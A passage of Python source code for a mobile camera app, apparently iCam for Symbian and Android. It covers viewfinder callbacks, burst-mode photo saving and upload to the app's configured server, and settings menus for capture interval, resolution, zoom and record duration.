                        #    mov["data_2"], mov["data_3"]),
                        #    font="title", fill = 0xff0000)
                        if False:
                            CallAlarmPhone()
                    else:
                        prevVFFrame = crtVFFrame
                        """
                        if SYMBIAN_3:
                            appuifw.app.body.begin_redraw()
                            # Erase text.
                            appuifw.app.body.text((100, 175), u"MD",
                                font="title", fill=0xFFFFFF)
                            appuifw.app.body.end_redraw()
                        else:
                            # Erase text.
                            appuifw.app.body.text((100, 175), u"MD",
                                font="title", fill=0xFFFFFF)
                        """
                        # Erase text.
                        appuifw.app.body.text((100, 175), u"MD", \
                            font="title", fill=0xFFFFFF)
                else:
                    DebugPrint("ViewFinderCallbackS60BurstMode(): else branch " \
                        "prevVFFrame = %s, " \
                        "motionDetectionIsOn = %s" % \
                        (str(prevVFFrame), str(motionDetectionIsOn)))
                    prevVFFrame = crtVFFrame
                    # We consider the 1st frame to be relevant
                    motionDetected = True
            # No store, no upload
            if NoInternetConnection() and (storeLocallyMedia == 0) and \
                (bluetoothMode != 2):
                PetWatchdog()
            else:
                #pass
                # Save + upload the frame, unless motion detection is on and
                # nothing moved.
                if (motionDetectionIsOn == False) or \
                    (motionDetectionIsOn and motionDetected):
                    photoFileName = \
                        GetCurrentDateTimeStringWithMilliseconds() + \
                        "_%d.jpg" % cameraId
                    """
                    crtTime = GetCurrentDateTime()
                    #photoFileName = time.strftime("%Y_%m_%d_%H_%M_%S",
                    #    crtTime) + ("_%d.png" % cameraId)
                    crtTime2 = GetTime()
                    #See http://discussion.forum.nokia.com/forum/showthread.php?116978-What-is-the-time-granularity-in-Pys60 .
                    numMilliseconds = (crtTime2 - int(crtTime2)) * 1000
                    photoFileName = time.strftime("%Y_%m_%d_%H_%M_%S",
                        crtTime) + ("_%03d_%d.jpg" % (numMilliseconds,
                        cameraId))
                    """
                    # if storeLocallyMedia == 0:
                    """
                    We check
                        MULTITHREADED_PHOTO_BURST_MODE_UPLOAD == False
                        because if
                        MULTITHREADED_PHOTO_BURST_MODE_UPLOAD == True,
                        then we upload photoPathFileName but since
                        there can be several threads simultaneously
                        uploading they have to save to different files.
                    """
                    if (storeLocallyMedia == 0) and \
                        (MULTITHREADED_PHOTO_BURST_MODE_UPLOAD == False):
                        # Since we don't want to store the file, we
                        # save it in the RAM drive.
                        #photoPathFileName = "D:/iCamTemp.jpg"
                        photoPathFileName = LOCAL_FOLDER_TEMP + \
                            "/iCamTemp.jpg"
                    else:
                        photoPathFileName = \
                            LOCAL_FOLDER_MEDIA_FILES + "/" + \
                            photoFileName
                    # pic = graphics.Image.open(photoPathFileName)
                    """
                    Requires backslashes, otherwise pic.save gives
                        exception:
                        "SymbianError: [Errno -28] KErrBadName"
                    """
                    photoPathFileNameWithBackslashes = \
                        photoPathFileName.replace("/", "\\")
                    """
                    From PyS60 2.0 manual:
                    save(filename[,callback=None, format=None,
                        quality=75, bpp=24, compression='default'])
                        Saves the image into the given file. The supported
                        formats are JPEG and PNG. If format is not
                        given or is set to None, the format is
                        determined based on the file name extension:
                        '.jpg' or '.jpeg' are interpreted to be in JPEG
                        format and '.png' to be in PNG format.
                        filename should be a full path name.
                        When saving in JPEG format, the quality argument
                        specifies the quality to be used and can range
                        from 1 to 100.
                        When saving in PNG format, the bpp argument
                        specifies how many bits per pixel the resulting
                        file should have, and compression specifies the
                        compression level to be used.
                        Valid values for bpp are:
                        1: Black and white, 1 bit per pixel
                        8: 256 gray shades, 8 bits per pixel
                        24: 16.7 million colors, 24 bits per pixel
                        Valid values for compression are:
                        'best': The highest possible compression ratio,
                            the slowest speed
                        'fast': The fastest possible saving, moderate
                            compression
                        'no': No compression, very large file size
                        'default': Default compression, a compromise
                            between file size and speed
                        If callback is given,the operation is asynchronous.
                        When the saving is complete, the callback is
                        called with the result code.
                    """
                    """
                    For Burst (Turbo) mode we do not resize - we just
                        save the photos in JPEG instead of PNG
                        (JPEG compresses fast and a lot when compared
                        to PNG).
                    Save the photo (as JPEG) with 75%?? quality
                        locally.
                    """
                    crtVFFrame.save(photoPathFileNameWithBackslashes,
                        None, None, quality=photoQuality)
                    DebugPrint("ViewFinderCallback(): Saved %s at " \
                        "photoQuality = %d (free_ram = %d)." % \
                        (photoPathFileName, photoQuality,
                        GetFreeRAM()))
                    """
                    DebugPrint("ViewFinderCallback(): Saved %s " \
                        "(free_ram = %d, GetTime() = %.3f," \
                        " time.clock() = %.3f)." % \
                        (photoPathFileName, GetFreeRAM(),
                        GetTime(), time.clock()))
                    """
                    # Worker used when multi-threaded upload is enabled:
                    # uploads one saved frame plus the app state.
                    def UploadThread2(photoFileName, photoPathFileName):
                        """
                        http://stackoverflow.com/questions/2576534/does-pythons-httplib-httpconnection-block
                        "Although you can do asynchronous requests, you
                            will have to make you entire program
                            async-friendly. Async does not magically
                            make your code non-blocking. It would be
                            much easier to do the request in another
                            thread or process if you don't want to
                            block your main loop."
                        """
                        """
                        We do not sleep to give time to the phone to
                            complete saving the video file, since the
                            save() returns when the file is really
                            saved.
                        """
                        # e32.ao_sleep(2)
                        UploadStateAndFileAndStoreState(
                            deviceId, cameraId,
                            photoFileName, photoPathFileName,
                            ICAM_SERVER_NAME,
                            WEBPAGE_UL_GZIPPED_STATE_AND_FILE
                            )
                    if MULTITHREADED_PHOTO_BURST_MODE_UPLOAD:
                        if uploadMediaToPicasa or (useiCamServer == 2): # (useiCamServer > 0)
                            """
                            Multithreaded version --> it tries to
                                paralelize as much as possible in
                                order to send as many photos as
                                possible (max the fps) to the server.
                            """
                            """
                            thread.start_new_thread(UploadThread2,
                                (photoFileName, photoPathFileName))
                            """
                            MyThreadStart(UploadThread2, \
                                (photoFileName, photoPathFileName))
                    else:
                        if uploadMediaToPicasa or (useiCamServer == 2): # (useiCamServer > 0)
                            # Single-threaded version
                            res = UploadStateAndFileAndStoreState(
                                deviceId, cameraId,
                                photoFileName, photoPathFileName,
                                ICAM_SERVER_NAME,
                                WEBPAGE_UL_GZIPPED_STATE_AND_FILE)
                    """
                    ERASE_ORIGINAL_MEDIA_FILE_AFTER_READ == True
                        --> UploadStateAndFileAndStoreState()
                        gives os.unlink(photoPathFileName)
                    """
                    if (storeLocallyMedia == 0) and \
                        (ERASE_ORIGINAL_MEDIA_FILE_AFTER_READ == False):
                        """
                        print "Since storeLocallyMedia == 0, " \
                            "I saved the photo on D: and " \
                            "now I erase it."
                        """
                        # sys.stdout.flush()
                        try:
                            if SYMBIAN_OS:
                                #if pyS60VersionNumber > 14:
                                if _PyS60_1_9_OR_NEWER:
                                    # Wait for the uploader to finish with
                                    # the file before deleting it.
                                    mediaUploadedLock.wait()
                            os.unlink(photoPathFileName)
                        except:
                            DebugPrintErrorTrace()
            # Advance the modulo frame counter used for periodic polling.
            if counterViewFinderCallback == \
                NUM_FRAMES_TO_UPDATE_VIEWFINDER_EVERY - 1:
                counterViewFinderCallback = 0
            else:
                counterViewFinderCallback += 1
        else:
            DebugPrint("ViewFinderCallbackS60BurstMode(): not saving since " \
                "crtVFFrame.size = %s." % str(crtVFFrame.size))
    except:
        DebugPrintErrorTrace()
def ViewFinderCallback(crtVFFrame):
    """Main per-frame viewfinder callback (registered via
    camera.start_finder).

    Resets device inactivity (keeps the shutter open), draws the recording
    time and FPS overlays, and either dispatches to the burst-mode handler
    or just blits the frame to the canvas. On Symbian^3 all drawing is
    wrapped in begin_redraw()/end_redraw(). Errors are logged and swallowed.
    """
    global viewFinderSize
    global posTimeForViewFinder
    global numFrames
    if SYMBIAN_OS:
        try:
            """
            We try to avoid the camera shutter closes on models like N95, N82
                - this might happen for example if the Burst (Turbo) and Motion
                Detection modes are on and there is no motion.
            """
            e32.reset_inactivity()
            """
            See http://kernel.symbian.org/wiki/Apps:Python_on_Symbian/07._Graphics_and_Multimedia
                (from "I had to use begin_redraw / end_redraw in almost all
                    examples of this book that uses canvas to make them work
                    correctly.")
                Less important:
                    http://www.symbian-freak.com/forum/viewtopic.php?f=32&t=41207&start=0 .
                http://pys60.garage.maemo.org/doc/s60/node25.html#1342
                    (PyS60 2.0 doc??)
                Question: Why is non-redraw drawing bad for performance?
                    * The window server caches drawing operations in the redraw
                    store. Delimiting drawing with begin_redraw()/end_redraw()
                    allows window server to efficiently manage drawing
                    operations.
                    If applications perform drawing operations outside
                    begin_redraw/end_redraw, window server cannot cull drawing
                    operations from its cache of drawing operations, because it
                    cannot know whether a set of drawing operations has been
                    superceded by a new set. In this scenario every frame of
                    drawing that is done on a non-redraw drawing window will become
                    slower and slower as it draws all the drawing operations for
                    the entire history of the window (well actually up until the
                    last begin_redraw/end_redraw for the whole window).
                    If an application performs begin_redraw/end_redraw, it tells the
                    window server that it can throw away any old drawing operations
                    it had for the area of the window specified in the redraw, thus
                    allowing for more optimal management of drawing operations.
                Question: What are the changes required for redraw drawing?
                    * Applications should delimit their drawing with
                    begin_redraw()/end_redraw() - i.e. they should replace
                    non-redraw drawing with redraw drawing. Sometimes, this is
                    as straight forward as adding these calls to existing
                    rendering code. In other cases (where the application has
                    been drawing using "incremental updates" to the window, the
                    application drawing code would need to be reworked to
                    perform a full refresh of the area redrawn for the rect
                    provided in begin_redraw(rect).
            """
            if SYMBIAN_3:
                appuifw.app.body.begin_redraw()
            # Signal StartViewFinderForCamera()'s wait loop that frames are
            # flowing.
            global startedReceivingFramesFromViewFinder
            startedReceivingFramesFromViewFinder = True
            """
            global viewFinderTimer, viewFinderTimerIsOn
            if viewFinderTimerIsOn:
                #viewFinderTimerIsOn = False
                viewFinderTimer.cancel()
            """
            # """
            # newImage = graphics.Image.new(crtVFFrame.size, '1')
            # newImage = graphics.Image.new(crtVFFrame.size)
            """
            # See
            # http://discussion.forum.nokia.com/forum/showthread.php?154420-How-to-get-pixel-colour-from-a-graphics-object :
            for y in range(height):
                for x in range(width):
            """
            """
            width, height = crtVFFrame.size
            for y in range(height / 2 - 10, height / 2 + 10):
                for x in range(width / 2 - 20, width / 2 + 20):
                    r, g, b = crtVFFrame.getpixel( (x, y) )[0]
                    newRGB = (255 - r, 255 - g, 255 - b)
                    # From
                    # http://discussion.forum.nokia.com/forum/showthread.php?114751-Is-there-a-setpixel-for-image-objects
                    # (a bit also
                    # http://discussion.forum.nokia.com/forum/showthread.php?120004-How-to-access-pixel-array-of-image-captured-by-viewfinder)
                    #newImage.point( (x, y), newRGB )
                    #newImage.point( (x, y), newRGB )
                    crtVFFrame.point( (x, y), newRGB )
            """
            crtTime = GetTime()
            # Overlays: recording time, then FPS / RL-adaptation info.
            ViewFinderCallbackS60Record(crtTime)
            ViewFinderCallbackS60InfoAndLearning(crtTime)
            """
            DebugPrint("ViewFinderCallback(): numFrames = %d." % (numFrames))
            """
            numFrames += 1
            if burstModeIsStarted and ((cameraMode[0] == 2) or \
                (cameraMode[1] == 2)):
                ViewFinderCallbackS60BurstMode(crtTime, crtVFFrame)
            else:
                """
                if SYMBIAN_3:
                    appuifw.app.body.begin_redraw()
                    appuifw.app.body.blit(crtVFFrame)
                    appuifw.app.body.end_redraw()
                else:
                    appuifw.app.body.blit(crtVFFrame)
                """
                """
                DebugPrint("ViewFinderCallback(): crtVFFrame.size = %s, " \
                    "viewFinderSize = %s" % \
                    (str(crtVFFrame.size), str(viewFinderSize)))
                """
                appuifw.app.body.blit(crtVFFrame)
                # """
                #print crtVFFrame.getpixel( (0, 0) )
                #sys.stdout.flush()
                #appuifw.app.body.blit(newImage)
                # This displays the viewfinder image:
                #appuifw.app.body.blit(crtVFFrame)
            if SYMBIAN_3:
                appuifw.app.body.end_redraw()
        except:
            DebugPrintErrorTrace()
viewFinderStarted = False
def StopViewFinderForCameraCallable(reallyStopViewFinder=True):
    """Stop the viewfinder (Symbian only): clear the started flag, refresh
    the menu and, when reallyStopViewFinder is True, stop the camera finder
    and restore the UI orientation. Refuses to run while video recording.
    """
    global viewFinderStarted
    global doNotDisplayRedrawInfo
    DebugPrint("Entered StopViewFinderForCameraCallable().")
    if SYMBIAN_OS:
        """
        This check is here to prevent the user to hit "Stop Viewfinder" when
        the phone records. I think this is a bit paranoid - I guess this
        case is not easy to reach.
        """
        if videoRecordStartTime != -1:
            DebugPrint("StopViewFinderForCameraCallable(): " \
                "videoRecordStartTime = %d, which means that it is " \
                "video recording --> bailing out." % \
                videoRecordStartTime)
            return
        viewFinderStarted = False
        SetMenu()
        if reallyStopViewFinder:
            try:
                camera.stop_finder()
                """
                This means we just stopped the VGA camera viewfinder - this happens
                for the S60 3rd edition phones, for ex.
                """
                if appuifw.app.orientation == "portrait":
                    SetUIOrientation(0, True)
                # Re-enable the redraw info suppressed while the finder ran.
                doNotDisplayRedrawInfo = False
            except:
                DebugPrintErrorTrace()
def StartViewFinderForCamera(cameraId, isBackLightOn, waitForVFFrames=False):
    """Start the viewfinder for the given camera (Symbian only).

    Stops any running finder, adjusts the UI orientation, re-initializes
    the camera (except on SamsungSGH-G810), then starts the finder with
    ViewFinderCallback. If waitForVFFrames is True, busy-waits (with
    ao_yield) until the first frame arrives. Refuses to run while video
    recording. Errors are logged (and optionally uploaded) and swallowed.
    """
    global deviceId, localPhotoResolution, viewFinderSize
    global viewFinderStarted
    global doNotDisplayRedrawInfo
    if SYMBIAN_OS:
        DebugPrint("Entered StartViewFinderForCamera(cameraId = %d, " \
            "isBackLightOn = %d) at %s: viewFinderSize = %s." % \
            (cameraId, isBackLightOn,
            GetCurrentDateTimeStringNice(), str(viewFinderSize)))
        if videoRecordStartTime != -1:
            DebugPrint("StartViewFinderForCamera(): " \
                "videoRecordStartTime = %d, which means that it is " \
                "video recording --> bailing out." % \
                videoRecordStartTime)
            return
        viewFinderStarted = True
        SetMenu()
        try:
            camera.stop_finder()
            """
            Inspired from
                http://discussion.forum.nokia.com/forum/showthread.php?164123-n73-fullscreen-camera-odd-behaviour .
            """
            # camera.release()
            SetUIOrientation(cameraId, True)
            if phoneModel != "SamsungSGH-G810":
                """
                Inspired from
                    http://discussion.forum.nokia.com/forum/showthread.php?164123-n73-fullscreen-camera-odd-behaviour .
                Reinitialize the camera to cope with the orientation change.
                # camera._my_camera = camera._camera.Camera(cameraId)
                # This is for camera2: camera.UseCamera(cameraId)
                """
                GeneralUseCameraS60(cameraId)
            # Erase the screen to only show the view finder on the screen.
            ClearScreen()
        except:
            (exceptionType, exceptionValue, exceptionTraceback) = \
                sys.exc_info()
            myText = "Exception in StartViewFinderForCamera(%d) - " \
                "details: photoMode = %s, free_ram = %d. %s." % \
                (cameraId, photoModeStr[photoModeIndex[cameraId]][1],
                GetFreeRAM(),
                repr(traceback.format_tb(exceptionTraceback)))
            """
            myText = "StartViewFinderForCamera(%d) returned an exception. " \
                "Bailing out..." % cameraId
            """
            DebugPrint(myText)
            DebugPrintErrorTrace()
            if MY_DEBUG_UPLOAD_MSG:
                UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
                    WEBPAGE_UL_GZIPPED_TEXT, None)
        try:
            DebugPrint("StartViewFinderForCamera(): calling " \
                "camera.start_finder().")
            """
            NOTE: For both cameraId 0 and 1, camera.start_finder can trigger a
                call to RedrawHandler(), so in this case we make
                doNotDisplayRedrawInfo = True and make it False only in
                StopViewFinderForCameraCallable.
            """
            doNotDisplayRedrawInfo = True
            """
            start_finder(callable[, backlight_on=1,
                size=main pane size ])
            """
            camera.start_finder(ViewFinderCallback, isBackLightOn,
                viewFinderSize)
            global numFrames, viewFinderStartTime
            numFrames = 0
            if burstModeIsStarted and (cameraMode[0] == 2):
                viewFinderStartTime = GetTime()
            if waitForVFFrames:
                """
                On N95 and N82 it takes 3-5 seconds for the ViewFinder to turn
                    on. We want to wait exactly what is needed to start the VF.
                #global viewFinderTimer, viewFinderTimerIsOn
                #viewFinderTimerIsOn = True
                # It sometimes breaks the control flow - the app is no longer
                #    progressing.
                #viewFinderTimer.after(15)
                """
                # """
                # Poll until ViewFinderCallback() reports the first frame.
                global startedReceivingFramesFromViewFinder
                startedReceivingFramesFromViewFinder = False
                while startedReceivingFramesFromViewFinder == False:
                    # pass
                    """
                    It crashes sometimes the app, especially if doing this in
                        Burst (Turbo) mode.
                    """
                    # e32.ao_sleep(1)
                    """
                    It implements brute busy waiting, which does not allow to
                        execute even callbacks, etc. (To stop a long
                        time.sleep() I had to remove the mem card...).
                        To make it work I use ao_yield().
                    """
                    time.sleep(0.5)
                    """
                    Inspired from
                        http://developer.symbian.org/wiki/Apps:Python_on_Symbian/03._System_Information_and_Operations#Wait.2FSleep .
                    """
                    e32.ao_yield()
                """
                But even so, for Burst (Turbo) mode, only 1-2 frames are
                    received in ViewFinderCallback(), and nothing else.
                    - is it missing some important active tasks?
                """
                # """
            DebugPrint("StartViewFinderForCamera(): Finished " \
                "StartViewFinderForCamera() at %s." % \
                GetCurrentDateTimeStringNice())
        except:
            (exceptionType, exceptionValue, exceptionTraceback) = \
                sys.exc_info()
            myText = "Exception in StartViewFinderForCamera(%d) - details: " \
                "photoMode = %s, free_ram = %d. %s." % \
                (cameraId, photoModeStr[photoModeIndex[cameraId]][1],
                GetFreeRAM(),
                repr(traceback.format_tb(exceptionTraceback)))
            """
            myText = "StartViewFinderForCamera(%d) returned an exception. " \
                "Bailing out..." % cameraId
            """
            DebugPrint(myText)
            DebugPrintErrorTrace()
            if MY_DEBUG_UPLOAD_MSG:
                UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
                    WEBPAGE_UL_GZIPPED_TEXT, None)
def StartViewFinderForCameraCallable(cameraId, isBackLightOn):
    # Factory: bind cameraId/isBackLightOn now and hand back a zero-argument
    # callable (e.g. for menu entries). The viewfinder is started only when
    # the returned callable is invoked, with waitForVFFrames=False.
    return lambda: StartViewFinderForCamera(cameraId, isBackLightOn, False)
"""
These functions set the capture time interval, the number of cameras used,
resolution, zoom and photo (JPEG) quality to the selected value.
"""
def SetPauseInterval_real(aPauseInterval):
    """Set the capture pause interval (seconds) and persist the state.

    On Symbian, an interval of 0 switches into Burst (Turbo) mode (when a
    single camera is active in the reactive loop); a non-zero interval
    leaves burst mode (if on) and resumes the normal ReactiveLoop.
    """
    global pauseIntervalStr, pauseInterval, MENU_SELECT_PREFIX
    global reactiveLoopIsStarted, burstModeIsStarted
    DebugPrint("SetPauseInterval_real(): pauseInterval = %d, " \
        "aPauseInterval = %d, len(pauseIntervalStr) = %d." % \
        (pauseInterval, aPauseInterval, len(pauseIntervalStr)))
    pauseInterval = aPauseInterval
    # SetMenu()
    StoreState()
    """
    # This might be the reason my app crashed.
    UploadText("New photo interval: %d." % pauseInterval,
        ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT)
    """
    if WINDOWS_CE_OS_PYTHONCE:
        StoreConfig_CamAutoCfg_WinCE()
    if ANDROID_OS:
        #!!!!TODO: implement properly for Android
        pass
    elif SYMBIAN_OS:
        if pauseInterval == 0:
            # Burst mode: only when exactly one camera is active
            # (cameraMode product is 0, sum is > 0) in the reactive loop.
            if (reactiveLoopIsStarted == True) and \
                (cameraMode[0] * cameraMode[1] == 0) and \
                (cameraMode[0] + cameraMode[1]) > 0:
                SetRecordDuration(0, 0)
                SetRecordDuration(1, 0)
                SetRecordDuration(2, 0)
                StartBurstMode()
        else:
            if burstModeIsStarted == True:
                # if reactiveLoopIsStarted == True:
                StopBurstMode()
            ReactiveLoop()
"""
We define this function as 2 lambdas to make it an callable even if it is
passed the aPauseInterval parameter.
"""
SetPauseInterval = lambda aPauseInterval: lambda : \
SetPauseInterval_real(aPauseInterval)
# This var is required as global.
# Set True by the form-save callback defined in PauseIntervalMenu().
pauseFormSaved = False
# Uses a Form
def PauseIntervalMenu(*args):
    """Let the user choose the pause interval between captures.

    Android: prompts with an input dialog (0 selects burst mode) and
    applies the value via SetPauseInterval(). Symbian: shows an appuifw
    Form with a combo built from pauseIntervalStr; when saved, the
    selected entry's value is applied and the state persisted. *args
    absorbs whatever the menu framework passes to the callback.
    """
    global pauseFormSaved
    global pauseInterval
    DebugPrint("PauseIntervalMenu(): pauseInterval = %d, " \
        "len(pauseIntervalStr) = %d." % \
        (pauseInterval, len(pauseIntervalStr)))
    if ANDROID_OS:
        try:
            """
            res = int(DialogGetInput("Enter Pause Interval:", "[seconds]",
                str(pauseInterval)))
            """
            #res = DialogGetInput("Enter Pause Interval:", "[seconds]",
            res = DialogGetInput(
                "Enter Pause Interval:", "[seconds (0 = Burst mode)]",
                str(pauseInterval))
            DisplayNote("res = %s" % str(res), waitTime=1.0)
            # int() raises on cancel/non-numeric input; the except below
            # then leaves pauseInterval unchanged.
            res = int(res)
            SetPauseInterval(res)()
        except:
            # myDroid.makeToast("pauseInterval = %d." % str(pauseInterval))
            DebugPrintErrorTrace()
    elif SYMBIAN_OS:
        """
        From http://wiki.forum.nokia.com/index.php/How_to_use_Form_in_Python_for_S60
        (and also http://www.mobilenin.com/pys60/info_tabs_forms.htm):
        """
        """
        try:
            appuifw.app.title = u"Pause Interval"
            selectionListPI = []
            for i in range(len(pauseIntervalStr)):
                if pauseIntervalStr[i][1] == pauseInterval:
                    selectionListPI += [unicode(MENU_SELECT_PREFIX
                        + pauseIntervalStr[i][0])]
                else:
                    selectionListPI += \
                        [unicode(pauseIntervalStr[i][0])]
            # As the UX team noticed, on touch devices, to select you need to
            # double tap (1 tap for focus, another for select).
            index = appuifw.selection_list(selectionListPI, 1)
            if index is not None:
                # pauseInterval = pauseIntervalStr[index][1]
                SetPauseInterval(pauseIntervalStr[index][1])()
        except:
            DebugPrintErrorTrace()
        """
        try:
            # Initialize a boolean variable to know whether the form is saved
            pauseFormSaved = False
            # Create a list to be used in "combo" selection mode.
            piComboList = []
            for piStr in pauseIntervalStr:
                piComboList += [u"%s" % piStr[0]]
            # Pre-select the combo entry matching the current interval.
            piIndex = 0
            for i in range(len(pauseIntervalStr)):
                if pauseIntervalStr[i][1] == pauseInterval:
                    piIndex = i
            myFields = [(u"Pause Interval", "combo", (piComboList,
                piIndex))] # (u"", "text", u"Pause Interval"),
            appuifw.app.title = u"Pause Interval"
            # Creates the form.
            """
            pauseForm = appuifw.Form(myFields,
                flags=appuifw.FFormEditModeOnly)
            """
            pauseForm = appuifw.Form(myFields,
                flags=appuifw.FFormEditModeOnly |
                    appuifw.FFormDoubleSpaced)
            # pauseForm = appuifw.Form(myFields, appuifw.FFormEditModeOnly)
            # Define a function to be called when the form is saved.
            def PauseFormSaved(arg):
                global pauseFormSaved
                pauseFormSaved = True
                return True
            # Assign the save function
            pauseForm.save_hook = PauseFormSaved
            # Show the form.This operation is blocking until we close the form.
            pauseForm.execute()
            # After the form is saved and closed, display the information.
            if pauseFormSaved == True:
                #print pauseForm[0][2]
                #appuifw.note(unicode("Google Username: " +
                #    pauseForm[0][2]), "info")
                """
                The combo form field value is a long integer. We convert it to
                int because we would receive
                "TypeError: Form combo field, bad index" at the next
                instantiation of appuifw.Form().
                """
                myIndex = int(pauseForm[0][2][1])
                SetPauseInterval(pauseIntervalStr[myIndex][1])()
                StoreState()
        except:
            DebugPrintErrorTrace()
        """
        # Doesn't work in Python 2.2 (e.g., PyS60 1.4.5)
        finally:
            appuifw.app.title = ICAM_APP_TITLE
        """
        # Restore the app title (finally: is avoided for Python 2.2 compat).
        appuifw.app.title = ICAM_APP_TITLE
def SetUploadedPhotoResolutionIndex_real(aResolutionIndex):
    """Select the resolution used for photos uploaded to the server.

    aResolutionIndex indexes photoResolutionStr; values outside the
    table are silently ignored. A valid choice is persisted through
    StoreState().
    """
    global photoResolutionStr, photoResolutionIndex, MENU_SELECT_PREFIX
    DebugPrint("SetUploadedPhotoResolutionIndex_real(): " \
        "aResolutionIndex = %d." % aResolutionIndex)
    # Reject out-of-range indices without touching the current setting.
    if not (0 <= aResolutionIndex < len(photoResolutionStr)):
        return
    photoResolutionIndex = aResolutionIndex
    StoreState()
"""
We define this function as 2 lambdas to make it an callable even if it is
passed the aResolutionIndex parameter.
"""
SetUploadedPhotoResolutionIndex = lambda aResolutionIndex: lambda : \
SetUploadedPhotoResolutionIndex_real(aResolutionIndex)
def SetLocalPhotoResolutionIndex(aLocalPhotoResolutionIndex):
    """Select the locally-stored photo resolution for the main camera.

    aLocalPhotoResolutionIndex indexes cameraPhotoSizes_JPEG_Exif[0];
    out-of-range values are silently ignored. A valid choice is written
    to localPhotoResolutionIndex[0], persisted via StoreState(), and
    applied to the camera through SetLocalPhotoResolution().
    """
    global localPhotoResolutionIndex, cameraPhotoSizes_JPEG_Exif, \
        MENU_SELECT_PREFIX
    # Fix: the log messages previously said "SetLocalPhotoResolutionIndex_real()",
    # which does not exist — this function has no _real/lambda split like
    # its siblings — so traces pointed at a nonexistent function.
    DebugPrint("SetLocalPhotoResolutionIndex(): " \
        "aLocalPhotoResolutionIndex = %d." % aLocalPhotoResolutionIndex)
    if aLocalPhotoResolutionIndex < 0 or \
        aLocalPhotoResolutionIndex >= len(cameraPhotoSizes_JPEG_Exif[0]):
        return
    localPhotoResolutionIndex[0] = aLocalPhotoResolutionIndex
    DebugPrint("SetLocalPhotoResolutionIndex(): made " \
        "localPhotoResolutionIndex[0] = %d." % \
        aLocalPhotoResolutionIndex)
    # SetMenu()
    StoreState()
    SetLocalPhotoResolution()
def SetDigitalZoom_real(aDigitalZoom):
    """Set the digital zoom step (effective on Symbian S60 only).

    On Symbian S60 the value is range-checked against camera.max_zoom();
    out-of-range values abort without persisting. On Android nothing is
    applied yet. The application state is persisted otherwise.
    """
    global digitalZoom
    DebugPrint("SetDigitalZoom_real(): aDigitalZoom = %d." % aDigitalZoom)
    if ANDROID_OS:
        # Digital zoom is not handled on Android.
        pass
    elif SYMBIAN_S60_OS:
        if 0 <= aDigitalZoom < camera.max_zoom():
            digitalZoom = aDigitalZoom
        else:
            return
    StoreState()
"""
We define this function as 2 lambdas to make it an callable even if it is
passed the aDigitalZoom parameter.
"""
SetDigitalZoom = lambda aDigitalZoom: lambda : \
SetDigitalZoom_real(aDigitalZoom)
# cameraId 0/1 select a camera's video duration; cameraId 2 selects audio.
def SetRecordDuration(cameraId, aRecordDuration):
    """Set a capture duration, in seconds, and persist the state.

    cameraId 0 or 1 updates videoRecordDuration for the main/VGA camera
    (also rewriting the Windows CE config file when applicable);
    cameraId 2 updates audioRecordDuration (microphone). Negative
    durations are rejected.
    """
    global videoRecordDuration, audioRecordDuration
    DebugPrint("SetRecordDuration(): cameraId = %d, aRecordDuration = %d." % \
        (cameraId, aRecordDuration))
    if aRecordDuration < 0:
        return
    if cameraId in (0, 1):
        videoRecordDuration[cameraId] = aRecordDuration
        if WINDOWS_CE_OS_PYTHONCE:
            # Windows CE keeps a dedicated config file in sync.
            StoreConfig_CamAutoCfg_WinCE()
    elif cameraId == 2:
        audioRecordDuration = aRecordDuration
    StoreState()
cameraStr = ["Main", "VGA"]
# If cameraId == 2 then it means audioRecordDuration.
def SetRecordDurationMenu_real(cameraId):
    """Prompt the user for a record duration and apply it.

    cameraId 0/1 asks for the main/VGA camera video duration; 2 asks
    for the microphone duration. Uses an Android input dialog or a
    Symbian number query; cancel or non-numeric input bails out without
    changing anything. NOTE(review): a cameraId outside 0..2 would leave
    myText/initVal unbound — callers only pass 0, 1 or 2.
    """
    global videoRecordDuration, audioRecordDuration
    DebugPrint("Entered SetRecordDurationMenu_real(cameraId = %d)." % cameraId)
    if cameraId == 0 or cameraId == 1:
        myText = "Video Record Duration (" + cameraStr[cameraId] + " Camera):"
        initVal = videoRecordDuration[cameraId]
    elif cameraId == 2:
        myText = "Audio Record Duration:"
        initVal = audioRecordDuration
    if ANDROID_OS:
        try:
            # res = int(DialogGetInput(myText, "[seconds]", str(initVal)))
            res = DialogGetInput(myText, "[seconds]", str(initVal))
            DisplayNote("res = %s" % str(res), waitTime=1.0)
            # int() raises on cancel/non-numeric input; handled below.
            res = int(res)
        except:
            # return
            DebugPrint("Exception in SetRecordDurationMenu_real(). " \
                "Bailing out...")
            DebugPrintErrorTrace()
            return
    elif SYMBIAN_OS:
        try:
            resStr = appuifw.query(unicode(myText), "number", unicode(initVal))
            if resStr is None:
                # User cancelled the query.
                return
            res = int(resStr)
        except:
            (exceptionType, exceptionValue, exceptionTraceback) = \
                sys.exc_info()
            DebugPrint("Exception in SetRecordDurationMenu_real(). " \
                "Bailing out...")
            DebugPrintErrorTrace()
            return
    # SetMenu()
    SetRecordDuration(cameraId, res)
    StoreState()
def SetRecordDurationMenu(cameraId):
    """Return a zero-argument callable opening the duration prompt.

    The closure makes SetRecordDurationMenu_real() usable as a menu
    handler, which is always invoked without arguments.
    """
    def _open():
        return SetRecordDurationMenu_real(cameraId)
    return _open
# These vars are required as globals: the nested save_hook callbacks in the
# form-based menus below set them to record that the user saved the form.
durationFormSaved = False
recordConfigFormSaved = False
def RecordConfigMenu():
    """Configure record durations, video modes and audio muting.

    Android: prompts for main-camera duration, mute choice and
    microphone duration via dialogs. Symbian: shows one appuifw Form
    whose fields (durations, per-camera video mode combos, mute combo)
    are read back BY POSITION after saving — the readback indices below
    must match the order in which myFields is built.
    """
    global recordConfigFormSaved
    global audioRecordDuration, videoRecordDuration, videoAudioEnabled
    global localVideoModeIndex, localVideoMode
    """
    In case something changed (e.g., on S60 camera2 module doesn't exist), we
    make sure the indices are within the valid values - otherwise, for ex,
    the S60 UI will raise exception.
    """
    for i in range(2):
        if (localVideoModeIndex[i] < 0) or \
            (localVideoModeIndex[i] >= len(cameraVideoModes[i])):
            localVideoModeIndex[i] = 0
        #if (localVideoMode[i] == []):
        #    localVideoModeIndex[i] = -1
    DebugPrint("Entered RecordConfigMenu():" \
        "  videoRecordDuration[0] = %d, videoRecordDuration[1] = %d\n" % \
        (videoRecordDuration[0], videoRecordDuration[1]) + \
        "  localVideoModeIndex[0] = %d, localVideoModeIndex[1] = %d\n" % \
        (localVideoModeIndex[0], localVideoModeIndex[1]) + \
